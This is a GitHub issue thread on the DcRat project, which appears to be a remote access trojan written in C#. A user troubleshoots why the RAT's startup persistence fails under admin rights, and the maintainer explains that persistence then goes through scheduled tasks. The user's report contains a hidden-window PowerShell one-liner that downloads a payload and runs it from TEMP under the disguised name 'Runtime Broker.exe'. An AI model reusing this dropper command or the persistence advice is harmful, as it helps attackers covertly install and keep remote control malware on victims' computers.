Install on startup fails to execute when run as admin

qwqdanchun / DcRat

A simple remote tool in C#.

MIT License

910 stars 332 forks source link

Install on startup fails to execute when run as admin #31

Closed FZKiritsugu closed 2 years ago

FZKiritsugu commented 2 years ago

Describe the bug Install on startup fails to execute when run as admin with powershell

To Reproduce Steps to reproduce the behavior:

run powershell as administrator
add a command to download and execute, the command below for example: powershell.exe -windowstyle hidden -Command (new-object System.Net.WebClient).DownloadFile('URL',$env:TEMP+'/Runtime Broker.exe');(New-Object -com Shell.Application).ShellExecute($env:TEMP+'/Runtime Broker.exe')

Expected behavior install on startup to work

qwqdanchun commented 2 years ago

is there any anti-virus software on your PC

FZKiritsugu commented 2 years ago

everything is disabled, works fine if i run powershell without admin privileges

qwqdanchun commented 2 years ago

try disable startup when you build the client,what happen then

FZKiritsugu commented 2 years ago

if i disable startup then the rat just connects, if i enable startup and run a command with powershell and admin privileges then the rat just connects but not adding anything on startup

FZKiritsugu commented 2 years ago

https://streamable.com/ar7dx7 here is a preview of it

qwqdanchun commented 2 years ago

check your schtasks

if admin,it will add a schtasks instead of registry

FZKiritsugu commented 2 years ago

i see, yeah it's working fine, it adds a task, thanks for clarifying that!